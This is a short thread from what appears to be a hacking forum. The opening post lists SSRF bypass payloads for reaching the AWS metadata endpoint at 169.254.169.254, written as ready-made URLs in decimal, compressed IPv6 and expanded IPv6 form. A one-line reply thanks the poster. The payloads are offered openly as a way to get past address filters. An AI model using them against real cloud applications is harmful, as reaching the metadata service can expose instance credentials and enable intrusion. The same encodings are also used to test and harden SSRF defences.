Welcome!

Welcome to the 1337pwn community forums. Register now for an account.

Register Now

Announcement

Collapse
No announcement yet.

AWS SSRF Bypasses For Accessing Metadata Endpoint

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    AWS SSRF Bypasses For Accessing Metadata Endpoint

    Here are a few ways to use SSRF to bypass AWS and obtain access to metadata endpoint:

    169.254.169.254 is a link-local address.

    IP number 2852039166 is equal to IP address 169.254.169.254.
    Code:
    Converted Decimal IP: http://2852039166/latest/meta-data/
    IPv4-mapped IPv6 address - 0:0:0:0:0:FFFF:A9FE:A9FE.

    Compressed IPv6 address – ::FFFF:A9FE:A9FE.
    Code:
    IPV6 Compressed: http://[::ffff:a9fe:a9fe]/latest/meta-data/
    Expanded IPv6 address - 0:0:0:0:0:ffff:a9fe:a9fe
    Code:
    IPV6 Expanded: http://[0:0:0:0:0:ffff:a9fe:a9fe]/latest/meta-data/

    #2
    This is very nice. Thank you! 😎

    Comment

    Working...
    X